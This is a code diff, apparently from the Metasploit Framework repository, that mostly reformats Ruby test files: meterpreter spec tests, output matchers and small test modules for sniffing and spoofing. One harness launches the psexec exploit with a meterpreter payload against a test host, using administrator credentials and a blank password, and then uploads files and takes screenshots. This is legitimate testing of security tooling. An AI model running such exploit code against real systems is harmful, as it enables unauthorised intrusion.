end
|
|
||||||
|
|
||||||
it "should not error when running help" do
|
it "should not error when running help" do
|
||||||
success_strings = [ 'Core Commands',
|
success_strings = [
|
||||||
'Stdapi: File system Commands',
|
'Core Commands',
|
||||||
'Stdapi: Networking Commands',
|
'Stdapi: File system Commands',
|
||||||
'Stdapi: System Commands',
|
'Stdapi: Networking Commands',
|
||||||
'Stdapi: User interface Commands']
|
'Stdapi: System Commands',
|
||||||
|
'Stdapi: User interface Commands'
|
||||||
hlp_run_command_check_output("help","help", success_strings)
|
]
|
||||||
|
|
||||||
|
hlp_run_command_check_output("help", "help", success_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should not error when running the help shortcut" do
|
||||||
|
success_strings = [
|
||||||
|
'Core Commands',
|
||||||
|
'Stdapi: File system Commands',
|
||||||
|
'Stdapi: Networking Commands',
|
||||||
|
'Stdapi: System Commands',
|
||||||
|
'Stdapi: User interface Commands'
|
||||||
|
]
|
||||||
|
|
||||||
|
hlp_run_command_check_output("help_shortcut", "?", success_strings)
|
||||||
|
end
|
||||||
|
|
||||||
|
it "should not error when checking for background channels" do
|
||||||
|
success_strings = [ 'No active channels.' ]
|
||||||
|
hlp_run_command_check_output("channel_list_empty", "channel -l", success_strings)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should not error when running the help shortcut" do
|
|
||||||
success_strings = [ 'Core Commands',
|
|
||||||
'Stdapi: File system Commands',
|
|
||||||
'Stdapi: Networking Commands',
|
|
||||||
'Stdapi: System Commands',
|
|
||||||
'Stdapi: User interface Commands' ]
|
|
||||||
|
|
||||||
hlp_run_command_check_output("help_shortcut","?", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
it "should not error when checking for background channels" do
|
|
||||||
success_strings = [ 'No active channels.' ]
|
|
||||||
hlp_run_command_check_output("channel_list_empty","channel -l", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -10,94 +10,87 @@ require 'meterpreter_specs'
|
||||||
require 'windows_meterpreter_specs'
|
require 'windows_meterpreter_specs'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
describe "Win32Meterpreter" do
|
||||||
|
# Include Custom Matchers
|
||||||
|
include MsfTest::MsfMatchers
|
||||||
|
|
||||||
describe "Win32Meterpreter" do
|
# This include brings in all the spec helper methods
|
||||||
|
include MsfTest::MeterpreterSpecHelper
|
||||||
|
|
||||||
# Include Custom Matchers
|
# This include brings in all the specs that are generic across the
|
||||||
include MsfTest::MsfMatchers
|
# meterpreter platforms
|
||||||
|
include MsfTest::MeterpreterSpecs
|
||||||
|
|
||||||
|
# This include brings in all the specs that are specific to the
|
||||||
# This include brings in all the spec helper methods
|
# windows meterpreter platforms
|
||||||
include MsfTest::MeterpreterSpecHelper
|
include MsfTest::WindowsMeterpreterSpecs
|
||||||
|
|
||||||
# This include brings in all the specs that are generic across the
|
|
||||||
# meterpreter platforms
|
|
||||||
include MsfTest::MeterpreterSpecs
|
|
||||||
|
|
||||||
# This include brings in all the specs that are specific to the
|
before :all do
|
||||||
# windows meterpreter platforms
|
@verbose = true
|
||||||
include MsfTest::WindowsMeterpreterSpecs
|
|
||||||
|
|
||||||
before :all do
|
@meterpreter_type = "win32"
|
||||||
@verbose = true
|
|
||||||
|
|
||||||
@meterpreter_type = "win32"
|
|
||||||
|
|
||||||
## Set up an outupt directory
|
|
||||||
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
|
||||||
|
|
||||||
if File.directory? @output_directory
|
## Set up an outupt directory
|
||||||
FileUtils.rm_rf(@output_directory)
|
@output_directory = File.join(File.dirname(__FILE__), "test_output_#{@meterpreter_type}")
|
||||||
|
|
||||||
|
if File.directory? @output_directory
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
end
|
||||||
|
|
||||||
|
Dir.mkdir(@output_directory)
|
||||||
|
@default_file = "#{@output_directory}/default"
|
||||||
|
|
||||||
|
create_session_windows_x32
|
||||||
end
|
end
|
||||||
|
|
||||||
Dir.mkdir(@output_directory)
|
before :each do
|
||||||
@default_file = "#{@output_directory}/default"
|
end
|
||||||
|
|
||||||
create_session_windows_x32
|
after :each do
|
||||||
end
|
@session.init_ui(@input, @output)
|
||||||
|
end
|
||||||
|
|
||||||
before :each do
|
after :all do
|
||||||
|
## Clean up test output
|
||||||
|
FileUtils.rm_rf(@output_directory)
|
||||||
|
|
||||||
end
|
## Screenshot command leaves .jpegs :(
|
||||||
|
## TODO - fix the meterpreter command to write to
|
||||||
after :each do
|
## TODO - an arbitrary file.
|
||||||
@session.init_ui(@input, @output)
|
Dir.new(File.dirname(__FILE__)).each do |file|
|
||||||
end
|
if file =~ /.jpeg/
|
||||||
|
File.delete(file)
|
||||||
after :all do
|
end
|
||||||
|
|
||||||
## Clean up test output
|
|
||||||
FileUtils.rm_rf(@output_directory)
|
|
||||||
|
|
||||||
## Screenshot command leaves .jpegs :(
|
|
||||||
## TODO - fix the meterpreter command to write to
|
|
||||||
## TODO - an arbitrary file.
|
|
||||||
Dir.new(File.dirname(__FILE__)).each do |file|
|
|
||||||
if file =~ /.jpeg/
|
|
||||||
File.delete(file)
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_session_windows_x32
|
|
||||||
|
|
||||||
## Setup for win32
|
def create_session_windows_x32
|
||||||
@framework = Msf::Simple::Framework.create
|
## Setup for win32
|
||||||
@exploit_name = 'windows/smb/psexec'
|
@framework = Msf::Simple::Framework.create
|
||||||
@payload_name = 'windows/meterpreter/bind_tcp'
|
@exploit_name = 'windows/smb/psexec'
|
||||||
@input = Rex::Ui::Text::Input::Stdio.new
|
@payload_name = 'windows/meterpreter/bind_tcp'
|
||||||
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
@input = Rex::Ui::Text::Input::Stdio.new
|
||||||
|
@output = Rex::Ui::Text::Output::File.new(@default_file)
|
||||||
|
|
||||||
# Initialize the exploit instance
|
# Initialize the exploit instance
|
||||||
exploit = @framework.exploits.create(@exploit_name)
|
exploit = @framework.exploits.create(@exploit_name)
|
||||||
|
|
||||||
## Fire it off against a known-vulnerable host
|
## Fire it off against a known-vulnerable host
|
||||||
@session = exploit.exploit_simple(
|
@session = exploit.exploit_simple(
|
||||||
'Options' => {'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => ""},
|
'Options' => { 'RHOST' => "vulnerable", "SMBUser" => "administrator", "SMBPass" => "" },
|
||||||
'Payload' => @payload_name,
|
'Payload' => @payload_name,
|
||||||
'LocalInput' => @input,
|
'LocalInput' => @input,
|
||||||
'LocalOutput' => @output)
|
'LocalOutput' => @output
|
||||||
|
)
|
||||||
|
|
||||||
## If a session came back, try to interact with it.
|
## If a session came back, try to interact with it.
|
||||||
if @session
|
if @session
|
||||||
puts "got a session"
|
puts "got a session"
|
||||||
@session.load_stdapi
|
@session.load_stdapi
|
||||||
else
|
else
|
||||||
puts "unable to get session"
|
puts "unable to get session"
|
||||||
#flunk "Couldn't get a session!"
|
# flunk "Couldn't get a session!"
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,49 +1,46 @@
|
||||||
module MsfTest
|
module MsfTest
|
||||||
module WindowsMeterpreterSpecs
|
module WindowsMeterpreterSpecs
|
||||||
|
## This file is intended to be used in conjunction with a harness,
|
||||||
|
## such as meterpreter_win32_spec.rb
|
||||||
|
|
||||||
## This file is intended to be used in conjunction with a harness,
|
def self.included(base)
|
||||||
## such as meterpreter_win32_spec.rb
|
base.class_eval do
|
||||||
|
it "should not error when uploading a file to a windows box" do
|
||||||
|
upload_success_strings = [
|
||||||
|
'uploading',
|
||||||
|
'uploaded'
|
||||||
|
]
|
||||||
|
|
||||||
def self.included(base)
|
## create a file to upload
|
||||||
base.class_eval do
|
filename = "/tmp/whatever"
|
||||||
|
if File.exist?(filename)
|
||||||
|
FileUtils.rm(filename)
|
||||||
|
end
|
||||||
|
hlp_string_to_file("owned!", filename)
|
||||||
|
|
||||||
it "should not error when uploading a file to a windows box" do
|
## run the upload / quit commands
|
||||||
upload_success_strings = [ 'uploading',
|
hlp_run_command_check_output("upload", "upload #{filename} C:\\", upload_success_strings)
|
||||||
'uploaded' ]
|
# hlp_run_command_check_output("quit","quit")
|
||||||
|
|
||||||
## create a file to upload
|
## clean up
|
||||||
filename = "/tmp/whatever"
|
|
||||||
if File.exist?(filename)
|
|
||||||
FileUtils.rm(filename)
|
FileUtils.rm(filename)
|
||||||
end
|
end
|
||||||
hlp_string_to_file("owned!", filename)
|
|
||||||
|
|
||||||
## run the upload / quit commands
|
it "should show the priv commands when running help" do
|
||||||
hlp_run_command_check_output("upload","upload #{filename} C:\\", upload_success_strings)
|
success_strings = [
|
||||||
#hlp_run_command_check_output("quit","quit")
|
'Priv: Elevate Commands',
|
||||||
|
'Priv: Password database Commands',
|
||||||
|
'Priv: Timestomp Commands'
|
||||||
|
]
|
||||||
|
|
||||||
## clean up
|
hlp_run_command_check_output("help_shortcut", "help", success_strings)
|
||||||
FileUtils.rm(filename)
|
end
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
it "should show the priv commands when running help" do
|
|
||||||
|
|
||||||
success_strings = ['Priv: Elevate Commands',
|
|
||||||
'Priv: Password database Commands',
|
|
||||||
'Priv: Timestomp Commands' ]
|
|
||||||
|
|
||||||
hlp_run_command_check_output("help_shortcut","help", success_strings)
|
|
||||||
|
|
||||||
|
it "should not error when taking a screenshot" do
|
||||||
|
success_strings = [ 'Screenshot saved to' ]
|
||||||
|
hlp_run_command_check_output("screenshot", "screenshot", success_strings)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should not error when taking a screenshot" do
|
|
||||||
success_strings = [ 'Screenshot saved to' ]
|
|
||||||
hlp_run_command_check_output("screenshot","screenshot", success_strings)
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
class Array
|
class Array
|
||||||
@@to_s_reported = {}
|
@@to_s_reported = {}
|
||||||
def to_s(*args)
|
def to_s(*args)
|
||||||
if(not @@to_s_reported[caller[0].to_s])
|
if (not @@to_s_reported[caller[0].to_s])
|
||||||
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
|
$stderr.puts "HOOK: Array#to_s at #{caller.join("\t")}"
|
||||||
@@to_s_reported[caller[0].to_s] = true
|
@@to_s_reported[caller[0].to_s] = true
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,7 +1,6 @@
|
||||||
class String
|
class String
|
||||||
@@idx_reported = {}
|
@@idx_reported = {}
|
||||||
def [](*args)
|
def [](*args)
|
||||||
|
|
||||||
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
|
if args.length == 1 && args[0].class == ::Integer && !@@idx_reported[caller[0].to_s]
|
||||||
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
|
$stderr.puts "HOOK: String[idx] #{caller.join("\t")}\n\n"
|
||||||
@@idx_reported[caller[0].to_s] = true
|
@@idx_reported[caller[0].to_s] = true
|
||||||
|
|
|
@ -1,68 +1,63 @@
|
||||||
|
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
module ModuleTest
|
||||||
|
attr_accessor :tests
|
||||||
|
attr_accessor :failures
|
||||||
|
|
||||||
module ModuleTest
|
def initialize(info = {})
|
||||||
attr_accessor :tests
|
@tests = 0
|
||||||
attr_accessor :failures
|
@failures = 0
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
def initialize(info={})
|
def run_all_tests
|
||||||
@tests = 0
|
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
|
||||||
@failures = 0
|
tests.each { |test_method|
|
||||||
super
|
self.send(test_method)
|
||||||
end
|
}
|
||||||
|
end
|
||||||
|
|
||||||
def run_all_tests
|
def it(msg = "", &block)
|
||||||
tests = self.methods.select { |m| m.to_s =~ /^test_/ }
|
@tests += 1
|
||||||
tests.each { |test_method|
|
begin
|
||||||
self.send(test_method)
|
result = block.call
|
||||||
}
|
unless result
|
||||||
|
print_error("FAILED: #{msg}")
|
||||||
end
|
print_error("FAILED: #{error}") if error
|
||||||
|
@failures += 1
|
||||||
def it(msg="", &block)
|
return
|
||||||
@tests += 1
|
end
|
||||||
begin
|
rescue ::Exception => e
|
||||||
result = block.call
|
|
||||||
unless result
|
|
||||||
print_error("FAILED: #{msg}")
|
print_error("FAILED: #{msg}")
|
||||||
print_error("FAILED: #{error}") if error
|
print_error("Exception: #{e.class} : #{e}")
|
||||||
@failures += 1
|
dlog("Exception in testing - #{msg}")
|
||||||
|
dlog("Call stack: #{e.backtrace.join("\n")}")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
rescue ::Exception => e
|
|
||||||
print_error("FAILED: #{msg}")
|
print_good("#{msg}")
|
||||||
print_error("Exception: #{e.class} : #{e}")
|
|
||||||
dlog("Exception in testing - #{msg}")
|
|
||||||
dlog("Call stack: #{e.backtrace.join("\n")}")
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_good("#{msg}")
|
def pending(msg = "", &block)
|
||||||
|
print_status("PENDING: #{msg}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def pending(msg="", &block)
|
module ModuleTest::PostTest
|
||||||
print_status("PENDING: #{msg}")
|
include ModuleTest
|
||||||
end
|
def run
|
||||||
end
|
print_status("Running against session #{datastore["SESSION"]}")
|
||||||
|
print_status("Session type is #{session.type} and platform is #{session.platform}")
|
||||||
|
|
||||||
module ModuleTest::PostTest
|
t = Time.now
|
||||||
include ModuleTest
|
@tests = 0; @failures = 0
|
||||||
def run
|
run_all_tests
|
||||||
print_status("Running against session #{datastore["SESSION"]}")
|
|
||||||
print_status("Session type is #{session.type} and platform is #{session.platform}")
|
|
||||||
|
|
||||||
t = Time.now
|
vprint_status("Testing complete in #{Time.now - t}")
|
||||||
@tests = 0; @failures = 0
|
if (@failures > 0)
|
||||||
run_all_tests
|
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
||||||
|
else
|
||||||
vprint_status("Testing complete in #{Time.now - t}")
|
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
||||||
if (@failures > 0)
|
end
|
||||||
print_error("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
|
||||||
else
|
|
||||||
print_status("Passed: #{@tests - @failures}; Failed: #{@failures}")
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
|
||||||
|
|
|
@ -2,93 +2,91 @@ $:.unshift(File.join((File.dirname(__FILE__))))
|
||||||
require 'regexr'
|
require 'regexr'
|
||||||
|
|
||||||
module MsfTest
|
module MsfTest
|
||||||
|
module MsfMatchers
|
||||||
|
class ContainACompleteTest
|
||||||
|
|
||||||
module MsfMatchers
|
def initialize()
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
class ContainACompleteTest
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
return @r.verify_start_and_end(@data, "meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"Beginning or end was incorrect."
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_failure_message
|
||||||
|
"Expected to find a no beginning or end, but it matched."
|
||||||
|
end
|
||||||
|
|
||||||
def initialize()
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def matches?(data)
|
def contain_a_complete_test
|
||||||
@data = data
|
ContainACompleteTest.new
|
||||||
return @r.verify_start_and_end(@data,"meterpreter_functional_test_start", "meterpreter_functional_test_end")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def failure_message
|
class ContainAllSuccesses
|
||||||
"Beginning or end was incorrect."
|
|
||||||
|
def initialize(successes = [])
|
||||||
|
@successes = successes
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
@string = @r.find_strings_that_dont_exist_in_data(@data, @successes)
|
||||||
|
return true if !@string
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"expected all successes, but didn't find '#{@string}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_failure_message
|
||||||
|
"expected to miss successes but found'm all :("
|
||||||
|
end
|
||||||
|
|
||||||
|
# alias :have_all_successes :contain_all_successes
|
||||||
end
|
end
|
||||||
|
|
||||||
def negative_failure_message
|
def contain_all_successes(successes = [])
|
||||||
"Expected to find a no beginning or end, but it matched."
|
ContainAllSuccesses.new(successes)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
class ContainNoFailuresExcept
|
||||||
|
|
||||||
|
def initialize(failures = [], exceptions = [])
|
||||||
|
@failures = failures
|
||||||
|
@exceptions = exceptions
|
||||||
|
@r = Regexr.new(true)
|
||||||
|
end
|
||||||
|
|
||||||
|
def matches?(data)
|
||||||
|
@data = data
|
||||||
|
@string = @r.find_strings_that_exist_in_data_except(@data, @failures, @exceptions)
|
||||||
|
return true if !@string
|
||||||
|
|
||||||
|
nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def failure_message
|
||||||
|
"expected no failure to be found, but found this: '#{@string}'"
|
||||||
|
end
|
||||||
|
|
||||||
|
def negative_falure_message
|
||||||
|
"expected to find failures, but didn't find any :("
|
||||||
|
end
|
||||||
|
|
||||||
|
# alias :have_no_failures :contain_no_failures
|
||||||
|
end
|
||||||
|
|
||||||
|
def contain_no_failures_except(failures = [], exceptions = [])
|
||||||
|
ContainNoFailuresExcept.new(failures, exceptions)
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def contain_a_complete_test
|
|
||||||
ContainACompleteTest.new
|
|
||||||
end
|
|
||||||
|
|
||||||
class ContainAllSuccesses
|
|
||||||
|
|
||||||
def initialize(successes=[])
|
|
||||||
@successes = successes
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
|
||||||
|
|
||||||
def matches?(data)
|
|
||||||
@data = data
|
|
||||||
@string = @r.find_strings_that_dont_exist_in_data(@data,@successes)
|
|
||||||
return true if !@string
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def failure_message
|
|
||||||
"expected all successes, but didn't find '#{@string}'"
|
|
||||||
end
|
|
||||||
|
|
||||||
def negative_failure_message
|
|
||||||
"expected to miss successes but found'm all :("
|
|
||||||
end
|
|
||||||
|
|
||||||
#alias :have_all_successes :contain_all_successes
|
|
||||||
end
|
|
||||||
|
|
||||||
def contain_all_successes(successes=[])
|
|
||||||
ContainAllSuccesses.new(successes)
|
|
||||||
end
|
|
||||||
|
|
||||||
class ContainNoFailuresExcept
|
|
||||||
|
|
||||||
def initialize(failures=[],exceptions=[])
|
|
||||||
@failures = failures
|
|
||||||
@exceptions = exceptions
|
|
||||||
@r = Regexr.new(true)
|
|
||||||
end
|
|
||||||
|
|
||||||
def matches?(data)
|
|
||||||
@data = data
|
|
||||||
@string = @r.find_strings_that_exist_in_data_except(@data,@failures,@exceptions)
|
|
||||||
return true if !@string
|
|
||||||
nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def failure_message
|
|
||||||
"expected no failure to be found, but found this: '#{@string}'"
|
|
||||||
end
|
|
||||||
|
|
||||||
def negative_falure_message
|
|
||||||
"expected to find failures, but didn't find any :("
|
|
||||||
end
|
|
||||||
|
|
||||||
#alias :have_no_failures :contain_no_failures
|
|
||||||
end
|
|
||||||
|
|
||||||
def contain_no_failures_except(failures=[],exceptions=[])
|
|
||||||
ContainNoFailuresExcept.new(failures,exceptions)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -6,84 +6,80 @@
|
||||||
|
|
||||||
class Regexr
|
class Regexr
|
||||||
|
|
||||||
def initialize(verbose=false, case_insensitive=true)
|
def initialize(verbose = false, case_insensitive = true)
|
||||||
@verbose = verbose
|
@verbose = verbose
|
||||||
@case_insensitive = case_insensitive
|
@case_insensitive = case_insensitive
|
||||||
end
|
end
|
||||||
|
|
||||||
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
|
# Check for the beginning and end lines. Handy when you need to ensure a log has started & completed
|
||||||
def verify_start_and_end(data,the_start,the_end)
|
def verify_start_and_end(data, the_start, the_end)
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
regex_start = Regexp.new(the_start, @case_insensitive)
|
regex_start = Regexp.new(the_start, @case_insensitive)
|
||||||
regex_end = Regexp.new(the_end, @case_insensitive)
|
regex_end = Regexp.new(the_end, @case_insensitive)
|
||||||
|
|
||||||
if regex_start =~ data_lines.first
|
if regex_start =~ data_lines.first
|
||||||
return regex_end =~ data_lines.last
|
return regex_end =~ data_lines.last
|
||||||
end
|
end
|
||||||
|
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
# Scan for any number of success lines. In order to pass, all successes must match.
|
# Scan for any number of success lines. In order to pass, all successes must match.
|
||||||
def find_strings_that_dont_exist_in_data(data,regexes=[])
|
def find_strings_that_dont_exist_in_data(data, regexes = [])
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
|
|
||||||
return nil unless regexes ## count as a pass
|
return nil unless regexes ## count as a pass
|
||||||
|
|
||||||
if regexes
|
if regexes
|
||||||
target_successes = regexes.size
|
target_successes = regexes.size
|
||||||
success_count = 0
|
success_count = 0
|
||||||
regexes.each { |condition|
|
regexes.each { |condition|
|
||||||
|
|
||||||
## assume we haven't got it
|
## assume we haven't got it
|
||||||
found = false
|
found = false
|
||||||
|
|
||||||
re = Regexp.new(condition, @case_insensitive)
|
re = Regexp.new(condition, @case_insensitive)
|
||||||
|
|
||||||
## for each of our data lines
|
## for each of our data lines
|
||||||
data_lines.each {|line|
|
data_lines.each { |line|
|
||||||
|
|
||||||
## if it's a match
|
## if it's a match
|
||||||
if line =~ re
|
if line =~ re
|
||||||
found = true
|
found = true
|
||||||
break ## success!
|
break ## success!
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
if !found
|
if !found
|
||||||
return condition ## return this string, it wasn't found.
|
return condition ## return this string, it wasn't found.
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
nil ## got all successes, woot!
|
nil ## got all successes, woot!
|
||||||
end
|
end
|
||||||
|
|
||||||
# Scan for failures -- if any single failure matches, the test returns true.
|
# Scan for failures -- if any single failure matches, the test returns true.
|
||||||
def find_strings_that_exist_in_data_except(data,regexes=[],exceptions=[])
|
def find_strings_that_exist_in_data_except(data, regexes = [], exceptions = [])
|
||||||
|
|
||||||
return false unless data
|
return false unless data
|
||||||
|
|
||||||
data_lines = data.split("\n")
|
data_lines = data.split("\n")
|
||||||
|
|
||||||
return nil unless regexes ## count as a pass
|
return nil unless regexes ## count as a pass
|
||||||
|
|
||||||
regexes.each { |condition|
|
regexes.each { |condition|
|
||||||
|
## for each failure condition that we've been passed
|
||||||
## for each failure condition that we've been passed
|
|
||||||
re = Regexp.new(condition, @case_insensitive)
|
re = Regexp.new(condition, @case_insensitive)
|
||||||
|
|
||||||
## assume we're okay
|
## assume we're okay
|
||||||
found = false
|
found = false
|
||||||
|
|
||||||
data_lines.each { |line|
|
data_lines.each { |line|
|
||||||
if re =~ line
|
if re =~ line
|
||||||
found = true # oh, we found a match
|
found = true # oh, we found a match
|
||||||
|
|
||||||
# but let's check the exceptions
|
# but let's check the exceptions
|
||||||
exceptions.map { |exception|
|
exceptions.map { |exception|
|
||||||
reg_exception = Regexp.new(exception, @case_insensitive)
|
reg_exception = Regexp.new(exception, @case_insensitive)
|
||||||
|
@ -95,12 +91,12 @@ class Regexr
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
|
|
||||||
# If we didn't find an exception, we have to fail it. do not pass go.
|
# If we didn't find an exception, we have to fail it. do not pass go.
|
||||||
return condition if found
|
return condition if found
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
nil ## no failures found!
|
nil ## no failures found!
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,19 +10,17 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Network Capture Tester',
|
'Name' => 'Simple Network Capture Tester',
|
||||||
'Description' => 'This module sniffs HTTP GET requests from the network',
|
'Description' => 'This module sniffs HTTP GET requests from the network',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
[ 'Sniffer' ]
|
||||||
[ 'Sniffer' ]
|
],
|
||||||
],
|
'PassiveActions' => [
|
||||||
'PassiveActions' =>
|
'Sniffer'
|
||||||
[
|
],
|
||||||
'Sniffer'
|
'DefaultAction' => 'Sniffer'
|
||||||
],
|
|
||||||
'DefaultAction' => 'Sniffer'
|
|
||||||
)
|
)
|
||||||
|
|
||||||
deregister_options('RHOST')
|
deregister_options('RHOST')
|
||||||
|
@ -39,16 +35,15 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
p = PacketFu::Packet.parse(pkt)
|
p = PacketFu::Packet.parse(pkt)
|
||||||
next unless p.is_tcp?
|
next unless p.is_tcp?
|
||||||
next if p.payload.empty?
|
next if p.payload.empty?
|
||||||
|
|
||||||
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
|
if (p.payload =~ /GET\s+([^\s]+)\s+HTTP/smi)
|
||||||
url = $1
|
url = $1
|
||||||
print_status("GET #{url}")
|
print_status("GET #{url}")
|
||||||
break if url =~ /StopCapture/
|
break if url =~ /StopCapture/
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
close_pcap()
|
close_pcap()
|
||||||
print_status("Finished sniffing")
|
print_status("Finished sniffing")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,33 +3,34 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Check Test",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
|
'Name' => "Check Test",
|
||||||
|
'Description' => %q{
|
||||||
This module ensures that 'check' actually functions for Auxiilary modules.
|
This module ensures that 'check' actually functions for Auxiilary modules.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' => [
|
||||||
[
|
|
||||||
[ 'OSVDB', '0' ]
|
[ 'OSVDB', '0' ]
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' => [
|
||||||
[
|
|
||||||
'todb'
|
'todb'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80)
|
Opt::RPORT(80)
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
|
@ -3,8 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Auxiliary
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
|
@ -12,15 +10,14 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Simple Ethernet Frame Spoofer',
|
'Name' => 'Simple Ethernet Frame Spoofer',
|
||||||
'Description' => 'This module sends spoofed ethernet frames',
|
'Description' => 'This module sends spoofed ethernet frames',
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Actions' =>
|
'Actions' => [
|
||||||
[
|
[ 'Spoofer' ]
|
||||||
[ 'Spoofer' ]
